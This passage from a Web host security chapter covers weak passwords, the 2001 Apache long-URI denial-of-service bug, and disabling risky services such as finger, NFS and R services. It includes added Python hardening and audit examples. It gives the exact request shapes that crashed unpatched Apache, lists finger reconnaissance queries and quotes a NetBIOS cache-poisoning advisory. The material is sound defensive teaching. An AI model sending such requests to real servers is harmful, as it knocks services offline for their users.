users can access, such as areas that house premium Web services for paying 
customers. This always entails passwords, and you can use various approaches for 
this, including simple, native Apache password controls, or database-based password 
access. 


These approaches are fine, but harbor the same inherent weakness: If users create 
their own passwords, those passwords will invariably be weak. So in the end, it 
doesn’t matter what controls you institute. 


Encryption is vital, and there’s no debating that, but even “strong” encryption fails 
when users make poor password choices, and they will. Users are lazy and forgetful. 
To save time and simplify their lives, most users create passwords from the following 
values: 


• Their birth date
• Their social security number
• Their children’s names
• Names of their favorite performing artists
• Words that appear in a dictionary
• Numeric sequences (like 90125)
• Words spelled backwards

These are terrible choices, and most cracking tools can crack such passwords in
seconds. In fact, good passwords are difficult to derive, even when you know
encryption well, for several reasons.
First, even your local electronic retail store sells computers with staggering processor
power. Such machines perform many millions of instructions per second, thus
providing attackers with the juice to try thousands of character combinations.


Furthermore, modern dictionary attack tools are advanced. Some, for example, 
employ rules to produce complex character combinations and case variations that 
distort passwords well beyond the limits of the average users’ imagination. Thus, 
even when users get creative with their passwords, cracking tools often prevail. 


Worse still, cross-network password attacks and compromises are common. Suppose 
that your users have Hotmail or AOL accounts (or any account that provides them 
with mail, chat, or other services elsewhere). Ninety percent of users aren’t savvy 
enough to make different passwords for different accounts. Thus, their Hotmail 
accounts have the same username/password pair as their AOL account. 


These conditions invite cross-network password compromise. Suppose that crackers 
expose several thousand Hotmail passwords—this has happened before. Suppose 
further that within that lot, twenty such victims also have accounts on your system. 
Suddenly, attackers have twenty valid username/password pairs from your system. 


This won’t get them far, but it will get them inside your premium service area, which 
probably deploys JSP, ASP, PHP, Perl, Python, ActiveX, or other technologies that 
interact with your database. Attackers can then study that technology and try attacks 
that they couldn’t otherwise try if they had access only to the home page. Over 
time, if there’s a weakness, they’Il find it. 


To ward off such situations as best you can, implement the following controls
whenever possible:


• Set passwords to expire every 60 days, with a 5-day warning and a 1-week
lockout, if your operating system supports it.

• Install proactive password checking, enforcing the maximum rules (using at
least a 100,000-term dictionary).

• Periodically check user passwords against the largest wordlist you can find. You
can automate this procedure using Perl on Windows, Unix, and Mac OS X.

• Watch security lists for new password exploits.

• Force users to create a new and unique password for each host they have access
to. Take logs from your proactive password checker that contains passwords
users previously tried and append these to proactive password checking
wordlists on other hosts. This way, users’ bad password choices follow them
across the network.

• Provide your users with basic education in password security. Even a simple
Web page explaining what makes a weak password is good. Users will read this
material if you offer it.
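A proactive password checker implementing the controls just listed, as an added example in Python rather than the Perl the text mentions (this is not code from the book). The wordlist, the shared rejection log and its line format are constructed here; a production checker would load a 100,000-term dictionary as the text recommends.

```python
"""Proactive password checker built from the controls listed in this chapter:
reject dictionary words (also reversed and with case, digit or substitution
variations), purely numeric values (birth dates, SSNs, sequences like 90125),
and passwords already rejected on other hosts.  Added example, not code from
the book.  The wordlist and shared rejection log below are constructed."""

from __future__ import annotations
import re

# Constructed sample dictionary.  Production checkers load a large wordlist file.
WORDLIST = {"password", "summer", "dragon", "letmein", "apache", "michael"}

# Constructed sample of passwords already rejected on other hosts, appended to
# this host's checker so that a user's bad choices follow them across the network.
SHARED_REJECTED = {"Tr0ub4dor", "Wint3r2001"}

# Character substitutions that cracking rules routinely undo (constructed table).
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})

# Numeric choices the text calls out: bare digit runs (90125, birth dates,
# social security numbers) and the same values written with separators.
NUMERIC_PATTERNS = (r"\d+", r"\d{3}-\d{2}-\d{4}",
                    r"\d{1,2}[/.-]\d{1,2}[/.-]\d{2,4}")

CHARACTER_CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")


def candidates(password: str) -> set[str]:
    """Apply the same rules a dictionary attack applies, so that Dragon99,
    nogarD1! and Dr4g0n!! all collapse to 'dragon' before the lookup."""
    base = password.lower()
    forms = {base, base[::-1]}
    # Strip leading/trailing digits and punctuation: 'dragon99' -> 'dragon'.
    core = re.sub(r"^[^a-z]+|[^a-z]+$", "", base)
    forms.update({core, core[::-1]})
    # Undo leet-speak on every form collected so far.
    forms.update({f.translate(LEET) for f in list(forms)})
    return {f for f in forms if f}


def check_password(password: str, wordlist=WORDLIST,
                   rejected=SHARED_REJECTED, min_len=8) -> list[str]:
    """Return every reason the password fails; an empty list means accepted."""
    reasons = []
    if len(password) < min_len:
        reasons.append(f"shorter than {min_len} characters")
    if any(re.fullmatch(p, password) for p in NUMERIC_PATTERNS):
        reasons.append("purely numeric sequence (date, SSN or digit run)")
    classes = sum(bool(re.search(p, password)) for p in CHARACTER_CLASSES)
    if classes < 3:
        reasons.append("uses fewer than three character classes")
    if candidates(password) & wordlist:
        reasons.append("dictionary word, possibly reversed or with digits/substitutions")
    if password in rejected:
        reasons.append("previously rejected on another host")
    return reasons


def harvest_rejections(log_text: str) -> set[str]:
    """Extract rejected passwords from a checker log so they can be appended to
    other hosts' wordlists.  The log format is constructed: 'user REJECTED pw'."""
    return {m.group(1) for m in re.finditer(r"REJECTED\s+(\S+)", log_text)}


if __name__ == "__main__":
    for pw in ("90125", "Dragon99", "nogarD1!", "Wint3r2001", "Correct-Horse-Battery-42"):
        print(pw, "->", check_password(pw) or ["accepted"])
```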
Denial of Service


A denial-of-service (DoS) attack is any action (initiated by a human or otherwise) that 
incapacitates your host’s hardware, software, or both, rendering your system 
unreachable and therefore denying service to legitimate (or even illegitimate) users. 


In a DoS attack, the attacker’s aim is straightforward: to knock your host(s) off the 
Net. Except when security teams test consenting hosts, DoS attacks are always mali- 
cious and unlawful. 


Denial of service is a persistent problem for two reasons. First, DoS attacks are quick,
easy, and generate an immediate, noticeable result. Hence, they’re popular among
budding crackers, or kids with extra time on their hands. As a Web administrator,
you should expect frequent DoS attacks; they’re undoubtedly the most common
type.


But there’s still a more important reason why DoS attacks remain troublesome. Many 
such attacks exploit errors or inconsistencies in vendor TCP/IP implementations. 
Such errors exist until vendors correct them, and in the interim, affected hosts 
remain vulnerable. 


An example is the historical Teardrop attack. This attack involved sending 
malformed UDP packets to Windows target hosts. Targets would examine the 
malformed packet headers, choke on them, and generate a fatal exception. When 
Teardrop emerged, Microsoft quickly re-examined its TCP/IP stack, generated a fix, 
and posted updates. 


However, things aren’t always that easy, even when you have your operating 
system’s source code, as Linux users do. As new DoS attacks arise, you may find your- 
self taking varied actions depending on the situation (such as patching software, 
reconfiguring hardware, or filtering offending ports). 


Finally, DoS attacks are especially irritating because they can crop up in any service 
on your system. In a moment, we’ll examine a DoS attack that Apache sustained in 
2001. However, even though Apache has a good record in this area (not many DoS 
vulnerabilities), that’s no cause to rejoice. Your operating system may harbor weak- 
nesses, too, as can many of its services. So, even when you have a bug-free Apache 
distribution, this doesn’t offer any guarantee that you'll escape DoS attacks. 


An Apache-Based Denial-of-Service Example A serious Apache vulnerability 
surfaced on April 12, 2001, when Auriemma Luigi discovered (and William A. Rowe, 
Jr. confirmed) that attackers could send a custom URL via Web browser and thereby 
hang Apache, or run the target’s processor to 100% utilization. 




Attackers could perform this DoS attack in one of three ways:

• Issue a GET request consisting of 8,184 / characters
• Issue a HEAD request consisting of 8,182 A characters
• Issue an ACCEPT of 8,182 / characters


As Mr. Luigi explained, in both Windows 98 and Windows 2000, if an attacker sent 
two or more strings from different connections, the targets would crash (and all 
connections would thereafter fall idle). 


The problem affected all Apache versions earlier than version 1.3.20 on the following 
platforms: 


• Microsoft Win32
• Microsoft Windows NT
• Microsoft Windows 2000
• OS/2


As reported by the Apache team (http://bugs.apache.org/index.cgi/full/7522):


In the case of an extremely long URI, a deeply embedded parser properly discarded the
request, returning the NULL pointer, and the next higher-level parser was not prepared for
that contingency. Note further that accessing the NULL pointer created an exception caught
by the OS, causing the apache process to be immediately terminated. While this exposes a
denial-of-service attack, it does not pose an opportunity for any server exploits or data
vulnerability.


Apache patched this problem in version 1.3.20. However, as I related earlier, Apache 
isn’t your only concern. You must be ever diligent to monitor security advisory lists 
for your operating system and any applications or modules that run on your Web 
host. 
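The failure class the Apache team describes above (a low-level parser correctly returns "nothing" for an over-long URI and the caller dereferences it) modelled in Python as an added example; this is not Apache's code. The function names, the 8,190-byte request-line limit (Apache's default LimitRequestLine, assumed to apply) and the sample requests are constructed.

```python
"""Model of the bug class behind the Apache 1.3 denial of service described in
this chapter: the low-level parser gives up on an over-long URI by returning
None (Python's stand-in for the NULL pointer) and a higher-level parser is not
prepared for that answer.  Added example, not Apache's code; the function
names, the limit and the sample requests are constructed."""

LIMIT_REQUEST_LINE = 8190   # assumption: Apache's documented default LimitRequestLine


def parse_request_line(line: str):
    """Low-level parser.  Returns (method, uri, version) or None when the
    request line is malformed or too long.  Returning None is correct
    behaviour; the question is whether every caller is prepared for it."""
    if len(line) > LIMIT_REQUEST_LINE:
        return None
    parts = line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return parts[0], parts[1], parts[2]


def handle_request_unprepared(line: str) -> str:
    """Unpatched shape: assumes the parser always succeeds.  Unpacking None
    raises TypeError, the analogue of dereferencing the NULL pointer that
    terminated the Apache child process."""
    method, uri, _version = parse_request_line(line)
    return f"200 {method} {uri}"


def handle_request_prepared(line: str) -> str:
    """Patched shape: the higher-level code tests for the 'no result' case
    and answers with an error status instead of dying."""
    parsed = parse_request_line(line)
    if parsed is None:
        if len(line) > LIMIT_REQUEST_LINE:
            return "414 Request-URI Too Long"
        return "400 Bad Request"
    method, uri, _version = parsed
    return f"200 {method} {uri}"


def serve(handler, line: str) -> str:
    """Run a handler the way a server child would.  An uncaught exception
    means the child died and the client's connection is simply dropped,
    which is the denial of service the advisory describes."""
    try:
        return handler(line)
    except TypeError:
        return "child process terminated (connection dropped)"


# Constructed requests: one ordinary, one shaped like the advisory's GET of
# 8,184 '/' characters (a request line just over the 8,190-byte limit).
NORMAL = "GET /index.html HTTP/1.0"
OVERLONG = "GET " + "/" * 8184 + " HTTP/1.0"

if __name__ == "__main__":
    for name, handler in (("unprepared", handle_request_unprepared),
                          ("prepared  ", handle_request_prepared)):
        print(name, "normal   ->", serve(handler, NORMAL))
        print(name, "overlong ->", serve(handler, OVERLONG))
```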


Defacement or Total System Seizure 


Your security should never lapse so far that attackers could deface your site or seize 
control of your Web hosts. Yet, this happens at least 50 times a day, all over the 
world. I could enumerate a dozen reasons why, but they all trace back to two root 
problems: the failure to adequately plan initial Web host configuration, and the 
failure to keep systems patched and up-to-date. 
First, securing your Web host really begins even before installation, when you make
your first crucial decision: the decision of what type of host you're building. The
most common types are as follows:


• Intranet Web hosts—Hosts without Internet connectivity, typically connected
to a Local Area Network

• Private or extranet Web hosts—Hosts that have Internet connectivity but
provide services only to a limited clientele

• Public or sacrificial Web hosts—Garden-variety Web hosts that users known
and unknown can access publicly, 24 hours a day, on the Internet


Each type demands a different approach. On intranets, you may provide network
services that you’d never allow on a public Web server (and these would pose
infinitely less risk). Pages that interface with ActiveX are good examples.


Default Linux or Windows/IIS installations include many services that your Web 
host can do without, including the following: 


• File Transfer Protocol
• finger
• Network File System
• R services


You must decide which services to provide by weighing their utility, their benefits, 
and the risks they pose. 


File Transfer Protocol 

File Transfer Protocol (FTP) is the standard method of transferring files from one
system to another. In intranet and private Web hosts, you may well decide to
provide FTP services as a convenient means of file distribution and acceptance. Or,
you might provide FTP to offer users an alternate avenue through which to retrieve
information that is otherwise available via HTTP.


For public Web servers, though, you should pass on public FTP. If your organization 
needs to provide public FTP services, consider dedicating a box specifically for this 
purpose. This is especially true if your developers have onsite access to the system. 
Consider using Secure Shell instead, which ships with an easy-to-use, graphical file 
manager that allows host-to-host transfers via SCP. 
finger

fingerd (the finger server) reports personal information on specified users,
including their username, real name, shell, directory, and office telephone number
(if available). This is primarily an issue for Unix-based servers.


finger is nonessential, and exposes your system to intelligence gathering. Dan
Farmer and Wietse Venema discussed the benefits finger offers to crackers in their
paper Improving the Security of Your Site by Breaking into It
(http://www.mindrape.org/papers/improve_by_breakin.html):


As every finger devotee knows, fingering “@”, “0”, and "", as well as common names, such
as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information.
What that information is depends on the version of finger that your target is running, but
the most notable are account names, along with their home directories and the host that they
last logged in from.


Crackers can use this information to track your staff’s movements, and even identify 
levels of trust within your organization and network. (At bare minimum, attackers 
can build user lists and establish other possible avenues of attack.) 


Network File System (NFS) 

Network File System (NFS) provides distributed file and directory access, and allows
remote users to mount your file systems from afar. On the remote user’s machine,
your exported file systems act and appear as though they’re local. NFS services
therefore vaguely resemble file and directory sharing on Windows and Mac OS.


In internal networks, you might well use NFS for convenience. For example, using
NFS, you can share out a central directory hierarchy located on a RAID (and
containing essential tools) to workstations system-wide. Or, you can use NFS to share
out user home directories. This will ensure that users have access to their files even
when they log in to different machines. Hence, user bozo can log in to
linux1.samshack.net, linux2.samshack.net, or scounix.samshack.net and still
have an identical /home directory.


Note, however, that basing or placing critical services on NFS volumes is a dangerous 
practice on enterprise systems. Here’s why: Attackers need only knock out a single 
service (NFS) to down thousands of sites. For example, imagine if you RAID-out all 
your virtual domains to individual co-located boxes so that your customers can 
manage their files, but you still have central control. If attackers knock out your NFS, 
all your customers’ Web sites will experience outages until your engineers restart 
NFS. Try to avoid basing your enterprise on systems that have such a vulnerable 
single-point-of-failure. 
If you do use NFS, though, take these steps:


• Create separate partitions for file systems you intend to export, and enable the
nosuid option on them.

• Export file systems read-only unless otherwise necessary.

• Limit portmapper access to trusted hosts. (Add portmapper and your approved
host list to /etc/hosts.allow. After you’ve done that, add portmapper to
/etc/hosts.deny and specify ALL).

• Never export your root file system.

• Your NFS server is configured by default to deny access to remote users logged
in as root. Do not change this.
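An audit of the NFS checklist above (root export, read-write exports, wildcard clients, unsquashed remote root, nosuid partitions, and portmapper wrapping in hosts.allow/hosts.deny), as an added Python example that is not from the book. The /etc/exports, /etc/fstab, hosts.allow and hosts.deny contents are constructed samples passed in as strings so the audit runs anywhere.

```python
"""Audit NFS-related configuration against the chapter's checklist.  Added
example, not from the book.  The four file contents are constructed samples
handed in as strings; on a real host you would read the files instead."""

from __future__ import annotations
import re


def parse_exports(text: str):
    """Yield (path, client, options) for every client of every export line,
    handling the 'path client1(opts) client2(opts)' syntax of /etc/exports."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]
        for client in clients:
            m = re.fullmatch(r"([^()]*)(?:\((.*)\))?", client)
            host = m.group(1) or "*"          # bare '(opts)' means any host
            opts = {o for o in (m.group(2) or "").split(",") if o}
            yield path, host, opts


def parse_fstab(text: str) -> dict[str, set[str]]:
    """Map each mount point in /etc/fstab to its set of mount options."""
    mounts = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 4:
            mounts[fields[1]] = set(fields[3].split(","))
    return mounts


def mount_point_for(path: str, mounts: dict) -> str:
    """Longest mount point that contains path ('/' contains everything)."""
    best = "/"
    for mp in mounts:
        if (path == mp or path.startswith(mp.rstrip("/") + "/")) and len(mp) > len(best):
            best = mp
    return best


def audit_nfs(exports: str, fstab: str, hosts_allow: str, hosts_deny: str) -> list[str]:
    """Return one finding per checklist violation; an empty list means clean."""
    findings = []
    mounts = parse_fstab(fstab)
    for path, host, opts in parse_exports(exports):
        if path == "/":
            findings.append(f"{path}: root file system is exported")
            continue
        if "rw" in opts:
            findings.append(f"{path} -> {host}: exported read-write")
        if "no_root_squash" in opts:
            findings.append(f"{path} -> {host}: remote root is not squashed")
        if host == "*":
            findings.append(f"{path}: exported to any host")
    # Exported file systems should live on their own partitions mounted nosuid.
    for path in sorted({p for p, _, _ in parse_exports(exports) if p != "/"}):
        if "nosuid" not in mounts.get(mount_point_for(path, mounts), set()):
            findings.append(f"{path}: not on a nosuid partition")
    # portmapper: denied to ALL in hosts.deny, trusted hosts listed in hosts.allow.
    if not re.search(r"^\s*portmap(?:per)?\s*:\s*ALL\b", hosts_deny, re.M):
        findings.append("hosts.deny: portmap is not denied to ALL")
    if not re.search(r"^\s*portmap(?:per)?\s*:", hosts_allow, re.M):
        findings.append("hosts.allow: no trusted-host list for portmap")
    return findings


# Constructed samples: one export that follows the rules and three that do not.
EXPORTS = """# constructed /etc/exports
/srv/www   192.168.1.0/24(ro,sync) 10.0.0.5(rw,no_root_squash)
/home      *(rw)
/          192.168.1.10(ro)
"""
FSTAB = """# constructed /etc/fstab
/dev/sda1  /         ext3  defaults         1 1
/dev/sdb1  /srv/www  ext3  defaults,nosuid  1 2
/dev/sdc1  /home     ext3  defaults         1 2
"""
HOSTS_ALLOW = "portmap: 192.168.1.\n"   # constructed trusted-host list
HOSTS_DENY = "portmap: ALL\n"           # constructed default deny

if __name__ == "__main__":
    for finding in audit_nfs(EXPORTS, FSTAB, HOSTS_ALLOW, HOSTS_DENY):
        print(finding)
```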


Otherwise, unless you have to, don’t run NFS on systems that support public Web
servers. The risks outweigh the benefits by a wide margin.


The R Services 

The R services (rsh, rlogin, rwho, and rexec) provide varying degrees of command 
execution on, or interaction with, remote hosts, and are quite convenient in closed 
network environments. However, these have no place on a public Web server. Let’s 
briefly run through each one and what it does. 


rshd (The Remote Shell Server) rshd (the Remote Shell server) allows remote
command execution. The client program (rsh) connects and requests a shell on the
specified remote host. There, rshd opens the shell and executes user-supplied
commands. rsh services are not suitable for publicly available Web servers. Don’t
install rsh unless you really need it.


rlogind (The Remote Login Server) rlogin is much like Telnet. In fact, once you
log in using rlogin, things will work exactly as if you were using Telnet. The
difference is this: rlogin is designed to automate logins between machines that trust
one another. In intranet environments or closed networks, providing rlogin services is
fine, but they’re not essential on a public Web host. Don’t install rlogind unless you
really need it.


rexecd (The Remote Execution Server) rexec services are antiquated, but still
available on Linux and many Unix systems. rexec offers remote command execution,
much like rsh. The chief difference is that users must supply a password to execute
commands with rexec. However, even with this level of protection, I would still
recommend disabling rexecd on public Web hosts.


Other Services 


Next, we’ll cover additional services that might be running if you didn’t personally 
perform the installation, or if others had previously administered your Web host. 

This is a common scenario. Your organization has been using a box for development 
for several months. Suddenly, you’re informed that the box should be converted to a 
Web or intranet host. Under these conditions, you should perform a re-installation. 
However, if you don’t, you may need to disable services that, although perfectly 
acceptable on a standalone or internal server, could pose security risks on a Web 
server. 


Things that likely don’t belong on your Web server include the following: 

• AOL Instant Messenger 
• CVS (use a separate box for that) 
• Gopher or other antiquated servers 
• ICQ 
• LDAP (unless you really need it) 
• Networked games (for example, Quake) 
• PCAnywhere, DoubleVision, or CloseUp 
• POP or IMAP servers 
• RealAudio or other sound clients or servers 
• Unix talk 
• Yahoo! Messenger 


Table 2.3 addresses additional services and utilities that default installations 
sometimes dump onto your drive, what they do, and suggestions on each one. 


TABLE 2.3 Other Network Services and Daemons 

Service       Discussion 

amd           amd is a tool for automatically mounting file systems and is often used in 
              NFS-enabled environments. Hence, it’s a strong candidate, likely to appear on 
              intranet hosts. If you’re migrating an intranet host to a public Web host, 
              check for amd. If it’s running, ensure that it isn’t needed, and if not, 
              disable it. 

bootparamd    bootparamd is a tool for remotely booting Sun systems. It has no place on a 
              public Web host, so if you find it running, disable it. 

dhcpd         dhcpd is the Dynamic Host Configuration Protocol (DHCP) daemon. DHCP allows 
              your system to relay vital network information to incoming clients. Users 
              needn’t know their IP address, default gateway, or subnet masks before 
              logging in because DHCP does it all for them. Public Web hosts have no need 
              for DHCP. If you find that dhcpd is running, disable it. 

gopherd       Gopher is an antiquated (but effective) document distribution system from 
              the University of Minnesota. Gopher was actually the Web’s predecessor and 
              was in many ways similar. Originally accessible only via command-line 
              interface, Gopher became the rage following the introduction of graphical 
              Gopher clients. While it’s true that most mainstream Web clients also 
              support Gopher, there are comparatively few instances in which you’d 
              actually provide Gopher services. Some distributions turn Gopher on by 
              default, so be sure to check for it and disable it. 

innd          innd is the Internet News daemon, a service not generally needed on public 
              Web hosts. 

lpd           lpd is the line printer daemon, also a service not generally needed on public 
              Web hosts (though often seen on intranet hosts). If you find lpd running, 
              disable it. 

portmap       portmap translates RPC program numbers into DARPA protocol port numbers, 
              and is only needed if you’re providing RPC services like NFS, rusers, rwho, 
              and so on (which, on a Web host, is inadvisable). 

smbd          smbd is the Samba server. It provides Server Message Block/LanManager-like 
              services for Unix systems. This allows Unix boxes to serve as file servers 
              in Microsoft-centric networks, and is therefore a common choice for intranet 
              hosts. On a public Web host, disable smbd. 

ypbind        ypbind allows client processes to bind or connect to NIS servers. Generally, 
              you wouldn’t run NIS on a public Web server, so I recommend disabling it. 

ypserv        ypserv serves local NIS information to remote hosts. Generally, you wouldn’t 
              run NIS on a public Web server, so I recommend disabling it. 





If you don’t know what services your Web host is running, try scanning the system 
from port 0 to port 65000. This will reveal many (but not all) running services. 
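Port scanning tells you what is listening; on a traditional Unix host most of the services this section warns about (rshd, rlogind, rexecd, talk, POP/IMAP, Gopher) are started from inetd, so the inetd configuration is where they are actually switched off. The following added example (not code from the book) parses a BSD-style /etc/inetd.conf, lists the active entries, and writes back a copy with the unwanted entries commented out. The inetd.conf shown is a constructed sample; hosts using xinetd keep this information in a different format and need a different parser.

```python
"""List and disable inetd-started services that do not belong on a public Web host.

Added example; the inetd.conf text is a constructed sample, not from the book.
"""
from typing import List, Tuple

# Constructed sample /etc/inetd.conf (service socket proto wait user server args).
SAMPLE_INETD_CONF = """\
# <service> <socket> <proto> <flags> <user> <server> <args>
ftp     stream  tcp  nowait  root        /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root        /usr/sbin/tcpd  in.telnetd
shell   stream  tcp  nowait  root        /usr/sbin/tcpd  in.rshd
login   stream  tcp  nowait  root        /usr/sbin/tcpd  in.rlogind
#exec   stream  tcp  nowait  root        /usr/sbin/tcpd  in.rexecd
talk    dgram   udp  wait    nobody.tty  /usr/sbin/tcpd  in.talkd
pop-3   stream  tcp  nowait  root        /usr/sbin/tcpd  ipop3d
gopher  stream  tcp  nowait  root        /usr/sbin/tcpd  gn
"""

# inetd service names for the daemons this section says to keep off a Web host.
UNWANTED = {
    "shell": "rshd (remote shell)",
    "login": "rlogind (remote login)",
    "exec": "rexecd (remote execution)",
    "talk": "Unix talk",
    "ntalk": "Unix talk",
    "gopher": "gopherd",
    "pop-3": "POP server",
    "pop3": "POP server",
    "imap": "IMAP server",
    "imap2": "IMAP server",
}


def _service_name(line: str):
    """Service field of an active entry, or None for blank and commented lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    return stripped.split()[0]


def enabled_services(conf: str) -> List[str]:
    """Names of every active (uncommented) inetd entry, in file order."""
    return [name for name in map(_service_name, conf.splitlines()) if name]


def harden_inetd_conf(conf: str) -> Tuple[str, List[str]]:
    """Comment out unwanted active entries; return new file text and what was disabled."""
    out, disabled = [], []
    for line in conf.splitlines():
        name = _service_name(line)
        if name in UNWANTED:
            # A leading '#' makes inetd ignore the whole line; the trailing note
            # records why it was disabled for the next administrator.
            out.append("#" + line + "   # disabled: " + UNWANTED[name])
            disabled.append(name)
        else:
            out.append(line)
    return "\n".join(out) + "\n", disabled


if __name__ == "__main__":
    hardened, removed = harden_inetd_conf(SAMPLE_INETD_CONF)
    print("disabled:", ", ".join(removed))
    print(hardened)
```

After writing the hardened file back, send inetd a HUP signal (or restart it) so the change takes effect, and re-scan to confirm the corresponding ports are closed.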


TIP 


The bottom line is this: When you build your Web host, try the “minimal is better” philosophy 
by eliminating everything that isn’t necessary, including the X Window System, games, 
multimedia, demos, development example files, sample applications, additional shells, and so on. 





Windows-Specific Services 

Finally, Windows supports several services you should carefully consider: 


• NETBIOS 
• NETBEUI 
• SMB/CIFS 




NETBIOS 

NETBIOS emerged in 1984 as the support protocol for Sytek’s IBM PC 
Network adapter card. Microsoft subsequently created LAN software for IBM systems 
(MS-NET) and adopted the NETBIOS specification. With these heavy hitters behind 
it, NETBIOS rose to power as a dominant protocol and specification by which PC 
clients communicated with PC-based file and print servers. It gradually entrenched 
itself in various network implementations on Microsoft Disk Operating System, 
Windows, OS/2, and compliant systems, and in Token Ring, Ethernet, and ARCNET 
networks. 


Classic NETBIOS shared many characteristics with protocols discussed previously, 
and operated in two modes, or rather provided two transmission scenarios: reliable 
and unreliable. Each transmission method uses a distinct frame type. 


NETBIOS frames in reliable transmissions are I-type frames. A transmission of I-type 
frames vaguely resembles a persistent TCP connection, which offers guaranteed 
delivery. In such transmissions, the sending and receiving node both remain 
connected, and perform on-the-spot error checking by passing a sequence number 
for each data block. Such data blocks are typically 64KB or less, and when NETBIOS 
encounters larger chunks, it fragments these to meet this limitation. 


In contrast, NETBIOS also supports UI-type frames. Transmissions of UI-type frames 
more closely resemble transfers using SOCK_DGRAM-type socket transmissions, where a 
persistent connection is not required. Here, the sending node hurls its frame into the 
vast network cosmos and neither expects nor receives delivery notification. Hence, 
UI-frame transmissions are unreliable—no guarantee exists that the data will be or 
was received as intended. 


Developers working with NETBIOS must articulate NETBIOS commands within a 
framework called the Network Control Block (NCB) format. NCB structure looks like 
this: 


typedef struct NCB { 
    BYTE  ncb_command; 
    BYTE  ncb_retcode; 
    BYTE  ncb_lsn; 
    BYTE  ncb_num; 
    DWORD ncb_buffer; 
    WORD  ncb_length; 
    BYTE  ncb_callName[16]; 
    BYTE  ncb_name[16]; 
    BYTE  ncb_rto; 
    BYTE  ncb_sto; 
    DWORD ncb_post; 
    BYTE  ncb_lana_num; 
    BYTE  ncb_cmd_cplt; 
    BYTE  ncb_reserved[14]; 
} NCB; 
Table 2.4 defines each field. 


TABLE 2.4 Network Control Block Fields 

Field       Significance 

bufadr      4-byte field that handles the message’s address 
buflen      2-byte field that stores the message’s buffer length 
callname    16-byte field that stores the computer name 
cmd_done    1-byte field that stores the command’s return code 
command     1-byte field that stores the command code 
lana_num    1-byte field that stores the NIC number 
lsn         1-byte field that stores the current session’s number 
name        16-byte field that stores the local computer name 
num         1-byte field that stores the NETBIOS node’s name number 
post        Address of user interrupt routine when a result is received 
res         A reserved, 14-byte field 
retcode     1-byte field that stores the command’s result 
rto         1-byte field that stores the receive time-out period 
sto         1-byte field that stores the send time-out period 


Table 2.5 lists NETBIOS commands and their significance. 


TABLE 2.5 NETBIOS Commands and Their Significance 

Command             Significance 

ADAPTER STATUS      Get status of an adapter 
ADD GROUP NAME      Add a group name to the table 
ADD NAME            Add a name to the name table 
CALL                Establish a session with another node 
CANCEL              Cancel a command 
CHAIN SEND          Send two buffers, concatenated 
DELETE NAME         Delete a name from the name table 
HANG UP             Close the current session 
LISTEN              Listen for a session request 
RECEIVE             Receive session data from a peer 
RECEIVE ANY         Receive data from any session 
RECEIVE BROADCAST   Receive the next broadcast 
RECEIVE DATAGRAM    Receive a datagram 
RESET               Reset NetBIOS 
SEND                Send data on the current session 
SEND BROADCAST      Send data to all nodes 
SEND DATAGRAM       Send data, addressed by name 
SESSION STATUS      Get the current session’s status 
UNLINK              Cancel boot redirection 
Does NETBIOS have security significance? Absolutely. All protocols do. Periodically, 
NETBIOS-related security issues arise, and you’d do well to study NETBIOS. One 
example arose in August 2000. In Network Associates’ COVERT Labs Security 
Advisory COVERT-2000-10, NAI folks informed us that: 


The Microsoft Windows implementation of the NetBIOS cache allows a remote attacker to 
insert and flush dynamic cache entries as well as overwrite static entries through unsolicited 
unicast or broadcast UDP datagrams. As a result, remote attackers either on the local subnet 
or across the Internet may subvert the NetBIOS Name to IP address resolution process by 
redirecting any NetBIOS Name to any arbitrary IP address under the control of the attacker. 


As a result: 


...dynamic NetBIOS cache entries can be inserted in addition to overwriting static entries 
imported from the LMHOSTS file. Furthermore, the NetBIOS cache is corrupted with an 
unsolicited UDP datagram, removing the requirement for attackers to predict Transaction IDs. 
With the NetBIOS cache under the control of a remote attacker many opportunities are 
available, one of the most obvious is to subvert outbound SMB connections to an arbitrary 
address. A rogue SMB server would then be able to capture NT username and password hashes 
as presented. 


Windows NT 4.0 and 2000 were vulnerable to such an attack. The answer was to 
filter out unauthorized connections to ports 135-139 and 445. (See 
http://www.pgp.com/research/covert/advisories/045.asp.) 


NETBEUI 

NETBEUI (NetBIOS Extended User Interface) is a nonroutable protocol that 
provides communication between machines supporting the Network Driver Interface 
Specification (NDIS). IBM developed it for smaller local area networks (with, say, 
10-200 nodes), and did not intend it to independently implement global networking. 
(IBM engineers left that to routers and other protocols that do perform routing.) 
NETBEUI was therefore popular in Novell NetWare and Windows for Workgroups 
networks (or similar systems), where several workstations needed local connectivity 
and communication, but no more. 


SMB/CIFS 

SMB (Server Message Block Protocol) is a protocol that enables nodes to 
share printers, files, and named pipes. The SMB Protocol Extension specification 
emerged on November 29, 1989, but followed earlier specifications for the 
OpenNet/Microsoft Networks File Sharing Protocol. 


SMB was originally a collection of extensions to the LANMAN 1.0 Microsoft file 
sharing protocol. SMB, using NETBIOS over TCP/IP for transport, enables servers to 
serve clients with access to remote network resources and the capability to open, 
read, and write remote files, browse remote directories, and so forth. 
At first an exclusively Microsoft/IBM technology, SMB has since crept into or 
inspired a variety of networking implementations on widely disparate operating 
systems. Some examples: 


• Digital PATHWORKS—PATHWORKS is a system that enables VAX hosts to function 
as SMB servers, and thus interface smoothly with Windows, Macintosh, 
and OS/2 client systems. Learn more at 
http://kuhub.cc.ukans.edu/www/html/721final/6558/6558pro_contents.html 

• SAMBA—SAMBA is an SMB server that enables Windows users (or in fact, 
anyone with an SMB client) to access Linux file systems. Learn more at 
http://www.samba.org 

• Syntax’s TotalNET Advanced Server—This product integrates various operating 
systems. Learn more at http://www.syntax.com/. 

• VisionFS from SCO—VisionFS allows PC systems to access Unix file servers 
transparently. Learn more at 
http://www.sco.de/products/openserver/whitepaper/4.htm 


The original SMB specification called for the following message structure: 


BYTE smb_idf[4];    (contains 0xFF,'SMB') 
BYTE smb_com;       (command code) 
BYTE smb_rcls;      (error class) 
BYTE smb_reh;       (reserved for future) 
